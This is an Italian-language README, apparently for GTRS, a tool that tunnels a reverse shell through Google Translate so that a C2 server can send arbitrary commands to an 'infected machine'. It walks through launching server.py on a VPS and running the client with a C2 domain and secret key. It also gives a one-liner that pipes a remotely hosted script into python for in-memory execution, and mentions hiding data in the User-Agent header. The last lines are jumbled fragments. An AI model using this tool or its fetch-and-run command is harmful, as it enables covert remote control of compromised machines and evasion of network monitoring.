
GTRS - Reverse Shell con Google Traduttore
Questo strumento utilizza Google Translator come proxy per inviare comandi arbitrari a una macchina infetta.
[INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
Per prima cosa hai bisogno di un VPS e un dominio; per il dominio puoi ottenerne uno gratuito su Freenom.
Avvia server.py sul tuo VPS
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
Ti fornirà una chiave segreta che verrà utilizzata sul client.
Esegui il client su un computer con accesso a Google Translator, fornendo il dominio e la chiave segreta generata dal server.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Ora hai una shell interattiva utilizzando file named pipe, SÌ puoi eseguire cd nelle directory.
Per prima cosa devi scaricare il binario o compilarlo, quindi il processo è uguale a quello del client bash,
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Con questo client hai la possibilità di eseguirlo su Linux, Mac e Windows, ma il client non ha ancora una shell interattiva.
Dopo aver letto questo articolo del blog, ho realizzato un semplice adattamento per eseguire GTRS in memoria: basta modificare host e chiave nello script inmemory-linux.py, quindi ospitarlo su un server e eseguire curl.
curl https://yourserver.ml/inmemory-linux.py | python
Oppure puoi ospitare lo script usando l'approccio youtube.
CODE_IS_CHEAP_SHOW_ME_THE_DEMO
.bashrc.Problema risolto utilizzando l'header User-Agent per inviare i dati.xmllint che si trova in libxml2-utilsProblema risolto, ora il client è scritto anche in Go.